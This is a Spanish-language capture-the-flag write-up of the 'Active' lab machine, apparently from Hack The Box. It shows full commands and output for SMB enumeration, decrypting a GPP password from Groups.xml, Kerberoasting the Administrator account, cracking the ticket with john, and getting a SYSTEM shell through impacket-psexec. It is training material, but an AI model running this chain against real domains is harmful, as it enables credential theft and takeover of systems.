Active
Active
Skills
- SMB Enumeration
- Abusing GPP Passwords
- Decrypting GPP Passwords - gpp-decrypt
- Kerberoasting Attack (GetUserSPNs.py) [Privilege Escalation]
Certificaciones
- OSCP
- OSEP
- eCPPTv3
Descripción
Active es una máquina easy windows, enumeramos el servicio smb y obtenemos un usuario y una contraseña en Groups.xm la cual desencriptamos. Efectuamos un Kerberoasting Attack y obtenemos el TGS (Ticket Granting Service) del usuario Administrator el cual crackeamos y posteriormente ganamos acceso a la máquina víctima mediante psexec
Reconocimiento
Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad
1
2
3
4
5
6
7
8
9
# ping 10.129.52.233
PING 10.129.52.233 (10.129.52.233) 56(84) bytes of data.
64 bytes from 10.129.52.233: icmp_seq=1 ttl=127 time=216 ms
64 bytes from 10.129.52.233: icmp_seq=2 ttl=127 time=161 ms
64 bytes from 10.129.52.233: icmp_seq=3 ttl=127 time=121 ms
^C
--- 10.129.52.233 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 121.153/166.270/216.454/39.071 ms
Nmap
Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.52.233 -oG openPorts
[sudo] password for justice-reaper:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 15:08 CEST
Initiating SYN Stealth Scan at 15:08
Scanning 10.129.52.233 [65535 ports]
Discovered open port 445/tcp on 10.129.52.233
Discovered open port 135/tcp on 10.129.52.233
Discovered open port 139/tcp on 10.129.52.233
Discovered open port 53/tcp on 10.129.52.233
Discovered open port 49153/tcp on 10.129.52.233
Discovered open port 49155/tcp on 10.129.52.233
Discovered open port 49168/tcp on 10.129.52.233
Discovered open port 47001/tcp on 10.129.52.233
Discovered open port 49154/tcp on 10.129.52.233
Discovered open port 5722/tcp on 10.129.52.233
Discovered open port 49165/tcp on 10.129.52.233
Discovered open port 3269/tcp on 10.129.52.233
Discovered open port 49152/tcp on 10.129.52.233
Discovered open port 49157/tcp on 10.129.52.233
Discovered open port 3268/tcp on 10.129.52.233
Discovered open port 636/tcp on 10.129.52.233
Discovered open port 464/tcp on 10.129.52.233
Discovered open port 49166/tcp on 10.129.52.233
Discovered open port 9389/tcp on 10.129.52.233
Discovered open port 88/tcp on 10.129.52.233
Discovered open port 49158/tcp on 10.129.52.233
Discovered open port 593/tcp on 10.129.52.233
Discovered open port 389/tcp on 10.129.52.233
Completed SYN Stealth Scan at 15:08, 18.89s elapsed (65535 total ports)
Nmap scan report for 10.129.52.233
Host is up (0.19s latency).
Not shown: 64550 closed tcp ports (reset), 962 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49166/tcp open unknown
49168/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds
Raw packets sent: 92271 (4.060MB) | Rcvd: 68766 (2.751MB)
Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168 10.129.52.233 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 15:09 CEST
Nmap scan report for 10.129.52.233
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-14 13:09:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-14T13:10:35
|_ start_date: 2024-08-14T12:59:21
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.49 seconds
SMB Enumeration
Listamos recursos compartidos con crackmapexec
1
2
3
4
5
6
7
8
9
10
11
12
13
# crackmapexec smb 10.129.52.233 -u '' -p '' --shares
SMB 10.129.52.233 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.52.233 445 DC [+] active.htb\:
SMB 10.129.52.233 445 DC [+] Enumerated shares
SMB 10.129.52.233 445 DC Share Permissions Remark
SMB 10.129.52.233 445 DC ----- ----------- ------
SMB 10.129.52.233 445 DC ADMIN$ Remote Admin
SMB 10.129.52.233 445 DC C$ Default share
SMB 10.129.52.233 445 DC IPC$ Remote IPC
SMB 10.129.52.233 445 DC NETLOGON Logon server share
SMB 10.129.52.233 445 DC Replication READ
SMB 10.129.52.233 445 DC SYSVOL Logon server share
SMB 10.129.52.233 445 DC Users
Nos conectamos con smbclient y nos descargamos el archivo Groups.xml
1
2
3
# smbclient --no-pass //10.129.52.233/Replication
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
Obtenemos un usuario y una contraseña
1
2
3
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Desciframos la clave y obtenemos unas credenciales SVC_TGS:GPPstillStandingStrong2k18
1
2
# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Kerberos Enumeration
Sincronizamos la hora de nuestro equipo con la del DC, esto es necesario para poder realizar varios ataques contra el servicio de kerberos
1
2
# sudo ntpdate 10.129.52.233
2024-08-15 01:45:52.666170 (+0200) +0.140977 +/- 0.093624 10.129.52.233 s1 no-leap
Vemos si hay algún usuario Kerberoasteable y obtenemos uno
1
2
3
4
5
6
# impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.52.233
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2024-08-14 15:00:28.281354
Kerberos Exploitation
Efectuamos el Kerberoasting Attack y obtenemos el TGS (Ticket Granting Service) del usuario Administrator
1
2
3
4
5
6
7
8
9
10
11
impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.52.233 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2024-08-14 15:00:28.281354
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$fae2224c28ab18c817b989c01a5b6a0a$f8e67a32aac107ab9e50d3dea5cf15089515ab2d5a098bfe7a2a8684ff21544995178ebccaa0af64a55acfb4d10a85a332896558321499ac551af46af5013ee8f56441202d9290155b3685d230f5d281abbc6ede8db3bb90997577e1ed1a42586451fc241d349f5515dc54fee0875e687297906d812ef6ab6af1339a421cc31a33c896966daabe04126248cb805b3cf86de2e84a61f3c4450bd1600d46aa259877928cb3a44215e4d6846595575463ca14c03c4061df5c4dfcbd1080ae6043d74ddba22e3a2d1487036735bfed682c3a71b792f3397f42cfcbf6b4cf2b30e3c0ed02548ee8bf3b4522f16d3c40ab2712d404312ab913423bae8fb9039a3d24eb25e5451576e95b87d5d032a6d82ed4947b912b15305b0ef598c3799ff2cb97878d2c9115cb272a704a91616cac22117f0275993cbd3233ad764ca3f2b41b6a5b22808c8128f090c86cf00c825c6bb0767c36aa622bd1ce2d63b40834e2c3c123e477c6890dae02578c6e9ae631ce7270969b6c357ece60557974493b656714d92bc42b6dee79f9d9b7f99b5133960c776e1cd4ce8f66607585eb6650b6e351f6a0cc5cd2941c707d5b4f7c4130c7b63f1ace675eff0efa2a7b786ab275ea7ef32690abbe3c5ae1124b44ae6b403e19604c18c8122b7fc4cd631d6c2ceec732cf67d6150fbed05f763b6a86bc65cb502df4ea4a7360e15987453e0021772c502b8b9778a6ada156a990d41054fb849a1114041dc40cdaf307315c9f62e196c172f0a4303c8a7a466209c8abbe4c1d5f1ced626d05befb828d3d7edd57c7d1073e4f14020bca89d13ca0679b32e75b106cf9673cd7f007697778b19cb97415825210042789481cadb31101bb0ae5a3ed504bf5f969d92453086b19572c3d022b5e7bc7b89fe812379321396fbcf76dc92603975500b924f507525bc8dcff4f646b8a5a93f30abe316be791f3545bb3b19a4113d3c7b1ae2299ea8ece56b1d83f458904e89cf567aa15d933e96f4bfb036d862f1aff96ea5b5f01c8c9473891ddff4ea60fae675c4232a96905a5ab9273abf947763260bf5f0554e5d8d04a2f57e6484ca0a582bfbdf660a868c6f7206d2c305e3f7af5c5d2fba3e6d596a4c1b07b7c1925161c798dce0a557bcd5a6f62961d631b1dd5ad206c82cbdf6eefc51ca19fe9c5759d87c9847411eac8d74a037579e0a788594af29adb5b9ef803d613d70a6974763c530cd127a1de66452ac4c758a9492121aecc7d0e74
Creamos un archivo con el TGS en su interior y lo crackeamos con john
1
2
3
4
5
6
7
8
9
10
# john -w:rockyou.txt hash
Created directory: /home/justice-reaper/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:53 DONE (2024-08-15 02:03) 0.01871g/s 197285p/s 197285c/s 197285C/s Tiffani1432..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Validamos las credenciales mediante smb
1
2
3
# crackmapexec smb 10.129.52.233 -u 'Administrator' -p 'Ticketmaster1968'
SMB 10.129.52.233 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.52.233 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
Intrusión
Nos conectamos como el usuario Administrator a la máquina víctima
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# impacket-psexec active.htb/Administrator:Ticketmaster1968@10.129.52.233
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.52.233.....
[*] Found writable share ADMIN$
[*] Uploading file ZyMSzmHt.exe
[*] Opening SVCManager on 10.129.52.233.....
[*] Creating service stiT on 10.129.52.233.....
[*] Starting service stiT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Cuando listamos información se ve de esta forma
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# impacket-psexec active.htb/Administrator:Ticketmaster1968@10.129.52.233
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.52.233.....
[*] Found writable share ADMIN$
[*] Uploading file dABTtDoh.exe
[*] Opening SVCManager on 10.129.52.233.....
[*] Creating service RfNM on 10.129.52.233.....
[*] Starting service RfNM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd \
C:\> dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
14/07/2009 06:20 �� <DIR> PerfLogs
Para solucionarlo debemos ejecutar este comando en la máquina víctima
1
2
C:\> chcp
Active code page: 737
Debemos añadir este codec al conectarnos con psexec para poder visualizar correctamente el contenido
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# impacket-psexec -codec cp737 active.htb/Administrator:Ticketmaster1968@10.129.52.233
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.52.233.....
[*] Found writable share ADMIN$
[*] Uploading file abYWgHub.exe
[*] Opening SVCManager on 10.129.52.233.....
[*] Creating service PSXu on 10.129.52.233.....
[*] Starting service PSXu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd \
C:\> dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\
14/07/2009 06:20 πμ <DIR> PerfLogs
12/01/2022 04:11 μμ <DIR> Program Files
21/01/2021 07:49 μμ <DIR> Program Files (x86)
21/07/2018 05:39 μμ <DIR> Users
15/08/2024 03:25 πμ <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 1.137.012.736 bytes free
Esta entrada está licenciada bajo CC BY 4.0 por el autor.